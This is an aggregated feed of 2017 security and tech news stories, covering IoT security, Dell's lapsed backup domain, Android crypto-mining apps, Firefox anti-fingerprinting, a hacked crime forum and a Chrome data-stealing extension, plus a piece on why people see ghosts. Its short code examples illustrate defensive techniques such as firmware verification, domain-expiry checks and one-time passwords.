Investment in cloud continues to be high as several core systems are modernized, including ERP, e-learning/LMS and student information systems (SIS). This shows that higher education institutions are far from finished investing in their learning environment and modernizing their core production systems.
Compared to the top new technology spending list for all survey respondents, one key thing stands out. New spending on digitalization/digital marketing is mentioned by 12 percent of respondents overall, but doesn’t appear at all on the higher education list, despite “digital” being fifth in top business priorities.
from Help Net Security http://ift.tt/2igOAan
Jezebel What Exactly Did Kevin Spacey Do on the Set of House of Cards? | Deadspin The Cavaliers Stink! | Very Smart Brothas We Need a Reset Button or Something for White People | Splinter What if ‘Lobbyist for Foreign Dictator’ Wasn’t a Job It Was OK to Have? | Earther The Now-Cancelled Puerto Rico Power Contract Was So Shady the FBI Is Investigating It |
from Lifehacker http://ift.tt/2luDKCu
Can ARM save the Internet of Things?
At last, a glimmer of hope that a company with industry clout might be about to impose order on flaky Internet of Things (IoT) security.
The saviour-in-waiting is ARM’s open source Platform Security Architecture (PSA), announced this week at the company’s TechCon show, a reference spec for which was promised for early 2018.
Terms like “architecture”, “framework” and “platform” can sound a bit abstract but the gist of the PSA is that it does a lot of difficult legwork for companies who fancy using ARM’s hardware to build their own IoT products and services.
Before designing anything, ARM’s engineers say they modelled likely attacks on different kinds of IoT devices before working out how to protect them.
For example, smart meters are a common IoT device vulnerable to remote attacks which, ARM reasons, can only be protected against by wrapping the meter in verified boot architecture (to stop firmware tampering), based on strong crypto, with a trust architecture to manage it.
What they’ve come up with is the open source “Trusted Firmware-M” designed to work with the company’s ARMv8-M processor architecture. This makes possible:
- A proper root of trust
- A protected crypto keystore
- Software isolation between trusted and untrusted processes
- A way of securely updating firmware
- Easy debugging down to chip level
- A reliable cryptographic random number generator
- On-chip acceleration to make crypto run smoothly
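The first two items, a root of trust and verified boot, come down to refusing to run firmware that doesn’t match something the device already trusts. Here’s a deliberately simplified sketch of the idea (real devices verify an asymmetric signature against a key burned into hardware, not a bare hash, and the image contents here are invented for illustration):

```python
import hashlib

# Digest of the approved firmware image. On a real device this anchor
# would live in immutable on-chip ROM or fuses, forming the root of trust.
TRUSTED_DIGEST = hashlib.sha256(b"firmware-v1.0").hexdigest()

def verify_firmware(image: bytes) -> bool:
    """Return True only if the image hashes to the trusted digest."""
    return hashlib.sha256(image).hexdigest() == TRUSTED_DIGEST

print(verify_firmware(b"firmware-v1.0"))       # genuine image: True
print(verify_firmware(b"firmware-v1.0-evil"))  # tampered image: False
```

The point of the PSA is that device makers get this whole chain – plus key storage, isolation and update logic – as a vetted reference design rather than reinventing it badly.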
For smart meter developers, building this on their own would lie somewhere between technically complex and economically impossible, one reason why this sector has ended up riddled with security problems.
The most infamous example of where those security problems can lead was last year’s Mirai, a botnet built by hijacking appallingly-secured IoT devices such as routers and webcams.
One insecure webcam is a problem for its owner. Tens of thousands of insecure webcams, corralled into something with the power to launch disruptive DDoS attacks on well-known internet services, are a problem for all of us.
Things have become so bad that the US Congress has even roused itself to propose an Internet of Things Cybersecurity Improvement Act, as a way of enforcing basic standards on device and gateway makers before the crack of doom. Because it’s hard to make this mandatory, a labelling scheme might be needed to sort the wheat from the chaff.
Is the arrival of PSA the moment when things change?
It certainly has backing, including from Google’s Cloud, Microsoft Azure, Cisco and Vodafone, as well as a host of smaller device makers who probably already use ARM kit. Big-name endorsement is important because big names provide (or would like to provide) the platforms on which a growing number of IoT devices operate.
It will also make the security side of IoT development a lot cheaper and easier for device makers of all kinds, who will be able to use it to solve myriad complex security problems they might once have ignored or underestimated.
One slightly confusing issue is that ARM already has the Mbed OS (and Mbed Cloud), launched in 2014 to do something that sounds very similar to the PSA but running on the ARMv7-M architecture. Apparently, PSA doesn’t yet support it but will do so in the future.
Perhaps the biggest takeaway from the PSA is that fixing this sector is not going to be cheap, or quick.
It’s true that the reference architecture is open source but implementing it depends on additional layers such as certificate-based authentication which, presumably, ARM will be delighted to offer at a price.
Device makers, and their customers, have been warned – IoT can be fixed but only by radically reforming the chaotic business model that has powered its breakneck growth rates.
from Naked Security http://ift.tt/2yYzbGa
Google Log-In Security for High-Risk Users
Google has a new login service for high-risk users. It's good, but unforgiving.
Logging in from a desktop will require a special USB key, while accessing your data from a mobile device will similarly require a Bluetooth dongle. All non-Google services and apps will be exiled from reaching into your Gmail or Google Drive. Google's malware scanners will use a more intensive process to quarantine and analyze incoming documents. And if you forget your password, or lose your hardware login keys, you'll have to jump through more hoops than ever to regain access, the better to foil any intruders who would abuse that process to circumvent all of Google's other safeguards.
It's called Advanced Protection.
Posted on October 30, 2017 at 12:23 PM
from Schneier on Security http://ift.tt/2gN0XKI
Dell forgot to renew the domain it uses for PC backups
Once upon a time, there was a Dell domain called (deep breath…)
dellbackupandrecoverycloudstorage.com
(Loooooooooong name, isn’t it? Kind of asking for trouble a la Equifax and that silly domain name it came up with post-mega-breach, wouldn’t you say? But that’s another story.)
Its purpose is to serve as an information repository for Dell’s data protection products. Its other job is to be a home base for Dell’s Backup and Recovery application, which “enables the user to backup and restore their data with just a few clicks.”
As Dell customer liaison Jesse L described it on a Dell support forum, the basic version of that program is installed by default on Dell PCs:
The Basic version comes pre-installed on all systems and allows the user to create the system recovery media and take a backup of the factory installed applications and drivers. It also helps the user to restore the computer to the factory image in case of an OS issue.
In other words, if you have a problem on your system – say, all of your files have been wiped or encrypted by malware – you can use Backup and Recovery to restore it to a pristine state.
As you can see, this all means that whoever controls that mouthful of a domain name could exercise an awful lot of power over the data on Dell customers’ systems.
Fine, if that somebody is Dell, but what if it’s not?
What if the somebody who controlled the domain wasn’t offering an if-all-else-fails route back to a malware-free system but was actually looking to spread malware?
Unfortunately, that may be exactly what happened for about a month this year, from early June to early July 2017.
On Tuesday, security reporter Brian Krebs published a tale of how during that time, the domain slipped out of the hands of a Dell partner – SoftThinks.com, a software backup and imaging solutions provider in Texas.
Krebs explains:
From early June to early July 2017, DellBackupandRecoveryCloudStorage.com was the property of Dmitrii Vassilev of “TeamInternet.com,” a company listed in Germany that specializes in selling what appears to be typosquatting traffic. Team Internet also appears to be tied to a domain monetization business called ParkingCrew.
A typosquatter registers misspelled domain names (think faceboook or goggle) in the hope of fooling users who mistype them. Type in a domain like that and you might find it hosting ads for scam products, or worse, it might be inhabited by a website designed for phishing or hosting malware.
Regardless of whether TeamInternet was the primary malware shipper (it’s possible the site was inadvertently malvertising), the server running what should have been a Dell-controlled domain started showing up in malware alerts about two weeks after SoftThinks let it slip out of its grasp.
Dell confirmed to The Register that it lost control of the domain. Here’s its statement:
[the domain] expired on June 1, 2017 and was subsequently purchased by a third party. The domain reference in the DBAR application was not updated, so DBAR continued to reach out to the domain after it expired. Dell was alerted of this error and it was addressed.
We do not believe that the Dell Backup and Recovery calls to the URL during the period in question resulted in the transfer of information to or from the site, including the transfer of malware to any user device.
Well, that’s a relief: malware might have been on the menu if you visited the domain with your web browser, but when your Dell Backup and Recovery application came calling it wasn’t.
What isn’t a relief: a major PC and data backup vendor – or what Dell calls the “Great Partner” it entrusts with its customers’ data – managed to #fail at something as easy as renewing a domain.
Of course, Dell isn’t alone in the walk of shame you have to take if your domain somehow slips from your grasp.
Earlier this month we brought you the story of a company that supplies a video relay service (VRS) – including emergency services – to deaf, hard of hearing and speech-disabled people. Forgetting to renew its domain meant a three-day outage for customers and a $3 million fine from the Federal Communications Commission (FCC).
Because really. Really. Failing to renew is hard.
Almost everyone wants you to renew – you want the domain and your registrar wants your money. Even if your domain expires it’s set aside for you and nobody else for what can amount to months of get-out-of-jail-free time as grace and redemption periods play out.
Still, it shouldn’t come to that. There are many ways to stay on top of your domain renewals – you could try to construct a memory palace, say, or perhaps you could get a tattoo, though you’d have to keep up with re-inking – but the easiest option is to hit autorenew when you register the name.
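If you’d rather not rely on memory palaces or tattoos, expiry dates are also machine-readable: registration data is published over RDAP (queryable via services like rdap.org). As a sketch of the idea, the fragment below parses the “events” array from such a lookup; the sample data is canned rather than a live query:

```python
from datetime import datetime, timezone

def days_until_expiry(rdap_events: list, now: datetime) -> int:
    """Return days until the 'expiration' event in an RDAP domain record."""
    for event in rdap_events:
        if event["eventAction"] == "expiration":
            expires = datetime.fromisoformat(
                event["eventDate"].replace("Z", "+00:00"))
            return (expires - now).days
    raise ValueError("no expiration event in RDAP response")

# Canned fragment of an RDAP response (real ones carry many more fields):
events = [{"eventAction": "expiration", "eventDate": "2017-06-01T00:00:00Z"}]
print(days_until_expiry(events, datetime(2017, 5, 2, tzinfo=timezone.utc)))  # 30
```

Wire something like this into a scheduled job that alarms below a threshold and a lapsed renewal stops being a memory problem.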
from Naked Security http://ift.tt/2xBgUKP
Cryptocurrency-mining script planted in apps on Google Play
Coinhive’s cryptocurrency-mining script has found its way into mobile apps offered on Google Play.
Trend Micro researchers have spotted two apps that have been equipped with it:
The first (prsolutions.rosariofacileads) is an app that is meant to help users pray the rosary, the second one (com.freemo.safetyne) allows users to “earn free Talk, Text, and Data” by racking up credits “by redeeming local coupons and deals, watching videos, taking surveys and more.”
“Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key,” the researchers explained.
“This JavaScript code runs within the app’s webview, but this is not visible to the user because the webview is set to run in invisible mode by default. When the malicious JavaScript code is running, the CPU usage will be exceptionally high.”
Is it worth it for the crooks?
Both of the apps have been pulled from Google Play, and the accounts of their developers have apparently been removed or suspended. They can still be downloaded from some third-party Android stores.
In addition to this, the researchers also unearthed a legitimate wallpaper app (com.yrchkor.newwallpaper) that has been modified to include a mining library.
“The efficacy of mobile devices to actually produce cryptocurrency in any meaningful amount is still doubtful,” the researchers noted, but pointed out that “the effects on users of affected devices are clear: increased device wear and tear, reduced battery life, comparably slower performance.”
They advised users to be on the lookout for covert crypto-mining apps and to uninstall apps that trigger a noticeable performance degradation on their devices.
from Help Net Security http://ift.tt/2hoLVf7
Why Do People See Ghosts?
You live and then you die and then you rot in a hole—or so say the elites, with their glasses, and their PhDs in neuroscience. This bummer reality has never appealed much to Americans, 72 percent of whom believe in some kind of afterlife. It’s a comparatively rarer, though still sizable, breed of American who believe in some spectral middle ground, in which, instead of rotting or going to hell, you float around and freak out your kids, or the new residents of the house where you were brutally murdered a hundred years ago.
According to Pew Research Center, close to one-fifth of Americans believe they’ve seen a ghost—a somewhat surprising statistic, given all the other ancient beliefs we’ve mostly jettisoned (bloodletting, for instance, has largely fallen out of vogue). For this week’s Giz Asks, we reached out to a number of psychologists and neuroscientists to figure out why this might be—and in the process learned that, given the number of ways our brain has of tricking us into seeing things, it’s a wonder that that statistic isn’t higher.
Christopher French
Founder of the Anomalistic Psychology Research Unit at Goldsmiths, University of London
Most of the time, when people think they’ve had a ghostly encounter, they haven’t necessarily actually seen something. Very often you’ll find that what people are referring to is a bit vaguer than that—a very strong sense of presence, for instance. Bereaved people might think that they smell the perfume that the deceased used to wear, or the tobacco they used to smoke.
People tend to assume, when you suggest that maybe they were hallucinating, that you’re saying that they’re crazy, and this just isn’t true—hallucinations are much more common amongst the non-clinical population than is generally appreciated. We can all hallucinate under appropriate conditions.
One of the phenomena that we’re particularly interested in is something called sleep paralysis. In its most basic form, sleep paralysis is very common. Estimates vary, but typically it’s estimated that about 8 percent of the general population suffer from basic sleep paralysis at least once in their lives, and a couple of groups—psychiatric patients and students—show it at a much higher rate.
What I mean by basic sleep paralysis is: You’re half awake and you’re half asleep—either going into sleep, or maybe coming out of it—and you get a period of temporary paralysis. It typically lasts a few seconds before you snap out of it. Most of the time it’s not a big deal—it’s a little bit disconcerting, that’s all.
For a smaller percentage of people, you get associated symptoms that can make for a much scarier experience—typically, a very strong sense of presence. Even if you can’t see or hear anything in the room with you, you get a very strong sense that there is something there. You might actually also hallucinate; you might hear voices, or footsteps, or mechanical sounds, or you might see dark shadows moving around the room, or lights, or monstrous figures, or shadow people. You might get tactile hallucinations—you might feel as if you’re being held, or you might feel someone breathing on the back of your neck. And bear in mind that throughout all of this, you can’t actually move.
So it’s not too surprising that lots of people who have this experience, if they’ve never heard of sleep paralysis as a scientific and medical concept, end up reaching for some kind of supernatural interpretation. And because it’s such a common experience, you only need a small percentage of people who are having sleep paralysis to go for those kinds of supernatural interpretations.
Michael Nees
Assistant Professor, Department of Psychology, Human Factors, Perception and Cognition Lab, Lafayette College
Our phenomenological experiences of the world—the things we believe we see and hear—are actively constructed from limited and incomplete inputs from the physical world. The light that falls upon our eyes and the sound waves that reach our ears often could have resulted from multiple possible physical sources. For example, a vaguely humanoid object in the corner of a dark room could be a person or a ghost, but it could also just be a jacket hanging on a coat rack. To resolve these ambiguities, we actively construct an internal, mental version of the physical world that reflects our own biases and expectations. Sometimes our perceptions do not reflect accurate representations of the physical world. “Pareidolia” is the name for a common category of misperceptions that occur when a random (i.e., inherently meaningless) perceptual experience is interpreted to have meaning. A common version of pareidolia is perceiving human faces in random configurations of physical objects; a classic example is when people claim to see the face of Jesus in a piece of toast.
Some researchers have suggested that we may be biased toward perceiving ambiguous stimuli as human or human-like, because detecting other human beings in our presence has adaptive value—meaning that, from an evolutionary perspective, other people are especially important stimuli for us to notice. According to this argument, a false alarm (mistakenly perceiving a random, inanimate object—perhaps momentarily—as human) is less harmful than a miss (failing to notice another actual human in one’s presence), thus, when faced with uncertainty, our perceptual systems are calibrated to be more likely than not to register an object as human.
There is some research to indicate that people who are prone to paranormal beliefs are especially likely to attribute human characteristics to ambiguous stimuli, and researchers have suggested that a spooky context or the suggestion of a paranormal situation can prime people to be more likely to interpret ambiguous stimuli as ghosts or poltergeists.
Neil Dagnall and Ken Drinkwater
Neil Dagnall is Reader in Applied Cognitive Psychology at Manchester Metropolitan University, researching anomalistic psychology and cognitive psychology; his lab is undertaking several projects centering on belief in the paranormal
Ken Drinkwater is a Senior Lecturer at Manchester Metropolitan University who studies paranormal belief
The survival hypothesis proposes that a disembodied consciousness (soul) survives bodily death. Seeing ghosts in this context confirms belief in life after death and produces reassurance.
Other explanations draw on environmental factors, such as electromagnetic fields and infrasound. Canadian neuroscientist Michael Persinger demonstrated that the application of varying electromagnetic fields to the temporal lobes of the brain could produce haunt-like experiences (perception of a presence, feeling of God, sensation of being touched, etc.).
Haunt-like perceptions can also arise from reactions to toxic substances. Toxicologist Albert Donnay hypothesizes that prolonged exposure to a range of substances (carbon monoxide, formaldehyde, pesticides, etc.) can produce hallucinations consistent with haunting. Similarly, Shane Rogers (an associate professor of civil and environmental engineering) reported that hallucinations caused by toxic mould could produce haunting-related perceptions.
Professor Olaf Blanke recently demonstrated that haunt-like illusions could arise from perceptual disorientation, specifically conflicting sensory-motor signals. Blindfolded participants performed hand movements in front of their body while a robot imitated the movements in real time by touching the participants’ backs. The synchronized movement of the robot allowed participants to adapt to the spatial discrepancy. However, a temporal delay between the participant’s movement and the robot’s touch produced disorientation accompanied by a strong feeling of a presence.
Terence Hines
Professor of neurology at Pace University and the author of Pseudoscience and the Paranormal
The human brain has evolved to find patterns. If you’re in the wilderness, and you hear something behind you, it’s way better to think that it’s really a lion or a sabertooth tiger sneaking up on you—to attribute that sound to some agency, something that has purpose. Because if it does have purpose, and you run away, you’re better off. And if it’s just random noise and you run away, there’s no foul, it doesn’t really cost you anything. So we’ve evolved to experience what neuroscientist types call false positives. It’s better to be safe than sorry.
[Another explanation] involves expectations, and there are a couple of lovely demonstrations of this effect. Some years ago, for a term project, one of my students took some people to a local graveyard. In one condition, people were taken to a particular grave and told, this is the grave of some old guy who died at 72 of natural causes. Nothing weird about it. This is late at night, midnight. And they would ask: what do you feel? Are you getting any sensations? And people said well, no, not really. And then in the other condition they took people to the same grave at about the same time, late at night, and said it was the grave of a teen girl who died tragically—she’d killed herself after her boyfriend left her, and she’s said to haunt this grave at midnight on the night in question, and this is the anniversary of her suicide. People freaked out. They saw her, they heard her—and it was all due to expectations. I’m not saying that the folks who experienced the ghost of this non-existent teenage girl were lying, or crazy, or hysterical—they weren’t. Their brain was just doing what brains do; they were using information they were given, which turned out to be incorrect.
Tapani Riekki
Cognitive neuroscientist, Department of Psychology and Logopedics, Faculty of Medicine, University of Helsinki
The key thing seems to be interpretation. We know from various studies that our information processing is not “bottom-up”—we don’t just see/hear/feel our environments. Instead, our perception of reality is a complex interplay between bottom-up and top-down processes. Top-down processes refer to the expectations, beliefs, and context that shape our perceptions and influence our interpretations. Even the basic bottom-up processes are not exact copies of reality but approximations shaped by context. How we experience our surroundings is a complex simulation of our mind that leaves a lot of space for interpretation and quirks.
Frank McAndrew
Cornelia H. Dudley Professor of Psychology at Knox College and an elected Fellow of the Association for Psychological Science
Seeing ghosts may be triggered by the “agency-detection mechanisms” proposed by evolutionary psychologists.
These mechanisms evolved to protect us from harm at the hands of predators and enemies. If you are walking down a dark city street and hear the sound of something moving in a dark alley, you will respond with a heightened level of arousal and sharply focused attention and behave as if there is a willful “agent” present who is about to do you harm. If it turns out to be just a gust of wind or a stray cat, you lose little by overreacting, but if you fail to activate the alarm response and a true threat is present, the cost of your miscalculation could be high. Thus, we evolved to err on the side of detecting threats in such ambiguous situations.
In other words, if an individual believes that an encounter with a ghost is a possibility, then ghosts may become the explanation that gets used to resolve uncertainty.
A recent study by Kirsten Barnes & Nicholas Gibson (2013) explored the differences between individuals who have never had a paranormal experience and those who have. They confirmed that experiences of supernatural phenomena are most likely to occur in threatening or ambiguous environments, and they also found that those who had paranormal experiences scored higher on scales measuring empathy and a tendency to become deeply absorbed in one’s own subjective experience.
Benjamin Radford
Benjamin Radford, M.Ed., is a Research Fellow with the Committee for Skeptical Inquiry, a non-profit educational organization based in Buffalo. He has researched ghostly and “unexplained” phenomena for nearly 20 years and is the author of several books on the topic, including “Investigating Ghosts,” out this fall.
When researching ghostly phenomena one of the first things you realize is that often “ghost” is simply a convenient (if sloppy) label for “an experience someone doesn’t understand.” Reports of full-bodied apparitions (the kind you might see at Disneyland’s Haunted Mansion, for example) are very rare. Instead you find that many “ghostly” experiences are much more ambiguous: odd smells or sounds, a feeling of being watched, temperature variations, animals acting up, and so on. Even such mundane experiences as losing your keys can be—and have been—chalked up to the doings of a mischievous resident spirit.
Because there’s such a wide variety of experiences attributed to spirits, there’s no single blanket explanation for all ghost reports. Some can be caused by mild hallucinations—I’m not talking about over-the-top, full-on wild LSD-type hallucinations of flying pink elephants, but much more common and subtle tricks of the eye and mind, especially those that might occur late at night. The human brain is wonderful but also fallible, and we don’t always perceive and interpret the world around us correctly—and because many “ghostly” experiences are small and fleeting (not the huge and obvious kind depicted in horror films), it’s easy to wonder if an odd sound or light is mysterious. This leads to the second common factor in why people believe they’re experiencing ghosts: usually they’re influenced by pop culture ideas about what ghosts are and how they act. People watch TV shows like Ghost Hunters (now past its tenth season of not finding ghosts) and are influenced by those shows in terms of what psychologists call priming. Our expectations often guide our perceptions and interpretations, and thus we often see or hear what we expect to—sometimes even if it’s not there. The psychological reasons why people claim to see (or believe that they see) ghosts are well understood—and that’s true whether ghosts exist or not!
Do you have a question for Giz Asks? Email us at tipbox@gizmodo.com.
from Lifehacker http://ift.tt/2yY7qL8
Deadspin Game 5 Was Murder On Baseballs And Superlatives | Jezebel Kevin Spacey Dodges Allegations of Sexual Advances Toward a Minor By Coming Out | Splinter ‘White Lives Matter’ Mob Attacks Interracial Couple After Tennessee Rally | Earther Is Antarctica’s Scarred Seafloor a Harbinger of Trouble to Come? | The Root Motorist Dead after 12-Year-Old Boy Attempting Suicide Jumped Off Overpass and Landed On Her Car |
from Lifehacker http://ift.tt/2yemAPD
Firefox will soon block canvas-based browser fingerprinting attempts
Starting with Firefox 58, users will be able to refuse websites’ requests for information extracted via the HTML5 canvas element, which can be used to fingerprint their browsers.
What is browser fingerprinting?
Browser fingerprinting is used as an alternative to browser cookies by websites and web analytics services that want to identify users and track their online behavior.
There are a number of browser/device fingerprinting techniques, but Mozilla aims to address the issue of “canvas fingerprinting,” which works by exploiting the browser’s HTML5 canvas element.
The technique works like this: a user visits a website that asks their browser to render text or graphics on a hidden canvas element. The rendered result is extracted, and a hash of it becomes the browser’s fingerprint.
This fingerprint is shared among advertising partners, and used to detect when that user visits affiliated websites. In this way, a profile of the user’s browsing habits can be created, and used to target advertising.
Canvas fingerprinting works because each browser and the system on which it is installed has a specific hardware and software configuration, meaning that the fulfilment of the site’s request will result in different renders and, therefore, different and possibly unique fingerprints.
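In a real tracker, the rendering and extraction happen in browser-side JavaScript (typically by reading the canvas back with `toDataURL()`); the sketch below, in Python with made-up stand-in bytes, illustrates only the final extract-and-hash step that turns a render into a fingerprint. The byte strings here are hypothetical placeholders for the pixel data two different machines would produce.

```python
import hashlib

def canvas_fingerprint(render_bytes: bytes) -> str:
    """Hash the extracted canvas output into a compact, stable identifier."""
    return hashlib.sha256(render_bytes).hexdigest()

# Stand-ins for the pixel data two machines would produce when asked to
# render the same hidden text: font, GPU, and driver differences make the
# actual bytes diverge slightly, so the hashes diverge too.
render_machine_a = b"...pixel data from machine A..."
render_machine_b = b"...pixel data from machine B..."

print(canvas_fingerprint(render_machine_a))  # stable across visits on A
print(canvas_fingerprint(render_machine_b))  # differs from machine A
```

The same machine re-rendering the same instructions yields the same hash, which is exactly what makes the technique useful for tracking without cookies.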
Some browser fingerprinting attempts can be prevented by using add-ons like Privacy Badger or DoNotTrackMe in conjunction with ad blocking lists.
Firefox changes
With the change, Firefox will prompt users for permission before websites can extract canvas data, making it the first of the major browsers to do something about this ubiquitous online tracking technique.
This new feature comes over four years after the Tor Browser gave users an option to prevent canvas fingerprinting, and is the result of an ongoing effort to bring Tor Browser privacy and security patches into Firefox. (Tor Browser is based on Mozilla Firefox ESR.)
Mozilla has a history of trying to prevent online user tracking. With Firefox 52, it stopped allowing websites to access the Battery Status API and the information it can provide about the visitor’s device, as well as implemented protection against system font fingerprinting.
Firefox 58 is due for release in January 2018, and another change set to take place with it is the removal of WoSign and StartCom root certificates from Mozilla’s root store.
A discussion has also recently been started on whether Firefox should continue trusting certificates signed by the Staat der Nederlanden Root CA – the Dutch national CA – in the wake of a new law that would allow the Dutch intelligence and security services to intercept internet traffic, and to use “‘false keys’ in third party systems to obtain access to systems and data.”
from Help Net Security http://ift.tt/2yYrPjq
Hacking site hacked by hackers
We try not to guffaw at cybercrime, but sometimes – especially on a Monday just after the clocks have gone back to remind us that summer is very much over – we allow ourselves a wry smile.
As we did today on reading a report from our chums at Bleeping Computer in which a cybercrook turned on his fellow crooks by hacking their underground forum and saying he would expose them to the cops…
…unless they forked over $50,000:
MESSAGE TO BASETOOLS OWNER: Hello, you have only 24 hours to pay 50.000$ OTHERWISE YOU WILL BE EXPOSED AROUND THE WORLD & ALSO WE HAVE TOO MANY PROOFS THAT WE HAVEN'T INCLUDED THEM HERE AND THOSE WE WILL SENT TO THE RELEVANT BODIES
The ebullient extortionist listed four examples of “relevant bodies”, all of them in the US: Homeland Security, the Treasury, the Department of Justice and, for good measure, the FBI. (We couldn’t help think that the Internal Revenue Service might be interested, too.)
According to Bleeping Computer, the crook uploaded some of his “proofs” to the Basetools hacking site itself, presumably to cause maximum embarrassment amongst the site’s criminal community.
These published “proofs” included a screenshot that’s supposed to show the web administration panel of the Basetools forum, listing the pseudonyms of the last 15 buyers and sellers, as well as the last 9 refunds.
Seems that the crooks have problems trusting each other on many different levels.
To pay or not to pay?
We don’t want to be seen as offering advice to cybercriminals, but we’d strongly urge against paying up in extortion cases like this.
It’s clear that the data has already been stolen – and some of it has already been shared with the world, if not yet with US law enforcement – so paying now won’t do much good.
In ransomware demands, the extortion typically covers a decryption key for data that almost certainly wasn’t copied by the crooks – in other words, if you decide you aren’t going to pay up, the crooks have nothing further to squeeze you with.
But when the crooks already have copies of your data, and are threatening to besmirch, embarrass or defraud you by exposing it, paying the fee won’t do anything to stop them besmirching you anyway.
Or coming back for more money next week.
For what it’s worth, it seems that the Basetools site owners haven’t quite figured out what to do yet, judging by the holding message on their underground forum at the time of writing [2017-10-30T12:00Z].
One thing they definitely haven’t done yet is to read our highly educational article What you sound like after a data breach.
What to do?
Hackers hacking hackers sounds funny, and perhaps it is – but if hackers can be hacked, then so can you, if you aren’t careful.
We don’t know how this attack happened, but the obvious precautions you can take for your own online service include:
- Patch promptly. If the crooks know what server software version you are using, and it has a known security hole, they may very well be able to break in automatically. In other words, if you haven’t patched, you’re the low-hanging fruit.
- Choose decent passwords. If the crooks can guess your password, or if you used the same password on another site that already got hacked, then the crooks don’t need to do any hacking themselves – they can just login directly.
- Use two-factor authentication (2FA). A one-time code that changes every time you login means that just guessing or stealing your password isn’t enough. If the code is calculated on or sent to your phone, then the crooks need your phone (and its unlock code) as well, which is a higher bar to jump over.
- Check your logs. If you keep logfiles for auditing purposes, for example so you can check who logged in when, examine them proactively in order to find out about security anomalies sooner rather than later.
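The one-time codes mentioned in the 2FA point above are typically generated with the standard HOTP/TOTP algorithms (RFC 4226 and RFC 6238): an HMAC over a moving counter – or, for TOTP, over the current 30-second time window – truncated to a short decimal code. A minimal Python sketch using only the standard library:

```python
import hashlib
import hmac
import struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    msg = struct.pack(">Q", counter)                     # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                           # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

def totp(secret: bytes, timestamp: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based OTP: HOTP over the current time window."""
    return hotp(secret, timestamp // step, digits)

# RFC 4226 test vectors for the shared secret "12345678901234567890":
print(hotp(b"12345678901234567890", 0))  # 755224
print(hotp(b"12345678901234567890", 1))  # 287082
```

Because the code changes every window, a stolen or guessed password alone is no longer enough – the attacker would also need the device holding the secret.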
Honour amongst thieves, eh?
from Naked Security http://ift.tt/2hmWkrF
Monday review – the hot 17 stories of the week
Get yourself up to date with everything we’ve written in the last seven days – it’s weekly roundup time.
Monday 23 October 2017
On Monday Paul Ducklin took to Facebook Live and explained the DDE email attack.
Tuesday 24 October 2017
Wednesday 25 October 2017
Thursday 26 October 2017
Friday 27 October 2017
Would you like to keep up with all the stories we write? Why not sign up for our daily newsletter to make sure you don’t miss anything. You can easily unsubscribe if you decide you no longer want it.
Follow @NakedSecurity
Image of days of week courtesy of Shutterstock.
from Naked Security http://ift.tt/2z2zeA4
Malicious Chrome extension steals all data
There’s a glut of malicious Google Chrome extensions out there, but some are more harmful than others. The one that SANS ISC incident handler Renato Marinho has dubbed “Catch-All” falls firmly into the more harmful category.
A data-stealing Chrome extension
Marinho spotted the extension being pushed onto users via a phishing e-mail with links to photos supposedly sent through WhatsApp. But, instead of the photos, the victims would download a malware dropper file called “whatsapp.exe”.
Once run, the dropper would present a fake Adobe PDF Reader install screen, and if the victim chose the “Install” option, they triggered the download of a .cab file carrying two executables: md0.exe and md1.exe.
Before the malicious extension is installed, the md0 executable tries to disable Windows Firewall, kill all Google Chrome processes, and disable several security features that could prevent the malicious extension from working as intended (such as Chrome’s improved Safe Browsing download protection).
Once all this is achieved, it extracts the Catch-All extension and changes Google Chrome launcher (“.lnk”) files to load it on the next execution.
Finally, the extension springs into action: it captures data posted by the victim on websites, and sends it to a C&C server via jQuery ajax requests.
The threat
Some extensions’ main purpose is to inject ads and spam users. Others’ is to push tech support scams or malware, or steal online banking credentials.
“Catch-All” goes after every piece of data the victim posts on any website, including login credentials for all kinds of online services.
As Marinho pointed out, this allows crooks to capture highly sensitive data with minimal effort.
“It wasn’t necessary for the attacker to attract the victim to a fake website with doubtful SSL certificates or deploying local proxies to intercept web connections. Quite the opposite, the user is accessing original and legitimate websites and all the interactions are working properly while data is captured and leaked. In other words, this method may subvert many security layers the victim may have in place,” he noted.
from Help Net Security http://ift.tt/2z3VnOH
Chris Eng: An infosec journey from offense to defense
“Come to my lab, I promise you’ll learn something cool,” a friend told Chris Eng. Within a couple of hours, the friend had walked him through writing an exploit for an obscure Linux bug, and Eng was hooked on the idea that a programming error could be leveraged to gain root privileges on a system.
Chris Eng, photo by Brendan Stewart
He spent the next year or so learning more about finding and exploiting software vulnerabilities and then left the NSA to join a startup called @stake.
“That was probably the first time I realized information security could be a lucrative career path, not just an intellectual pursuit,” he told me.
Currently the Vice President of Research at Veracode, Eng started his computer education at a pretty young age. He taught himself to program BASIC on a TI-99/4A and, somehow, that progressed into an interest in understanding how systems worked and how they were vulnerable.
“Like many in our field, I was constantly hunting for information on BBSes in the form of text files: how to crack copy protection on computer games, how the phone system worked, and so on. But I never really saw any of this as a career direction,” he says.
At the time, information security barely existed. In fact, most people didn’t even have Internet access. So he chose to major in electrical engineering and computer science, anticipating that he would be working in microprocessor design or similar hardware pursuits. In the end, that didn’t happen.
Infosec beginnings
His six years with @stake – including two years after the Symantec acquisition – heavily shaped how he views information security and software in general.
He spent the majority of his time on short, offense-focused projects. “I already knew network security was a mess, but the ease of breaking into one website after another helped me see how brittle and insecure software was, even at the largest, best resourced companies. Very few developers had received any training or guidance on how to write code securely, and our findings were often met with incredulity, even denial,” he recounts.
Among the many important lessons he learned while at @stake were that penetration testing will never scale with the pace of software development, and that understanding how to attack systems is a crucial element in understanding how to defend them.
By later joining Veracode, he seized the opportunity to spend some time on defense after many years on offense, and to try and address the software security problem in a completely new way, with a founding team that he liked and respected.
“Plus, I was excited to join at such an early stage (employee #15) where I knew my efforts would have significant impact and I could be influential. At Veracode, we’re unquestionably making it harder for attackers by finding software vulnerabilities early and helping developers fix them. Even though I’m not interacting directly with customers as much as I used to, my team builds those capabilities, and I’m proud to be having an impact.”
A decade in infosec
A lot of things have changed for the better since he started working in the infosec field.
“On the whole, we still fetishize 0-day vulnerabilities to an extreme I feel is unhealthy, but I’ve started to see more emphasis and respect with regard to defensive work, which is a positive trend,” Eng says.
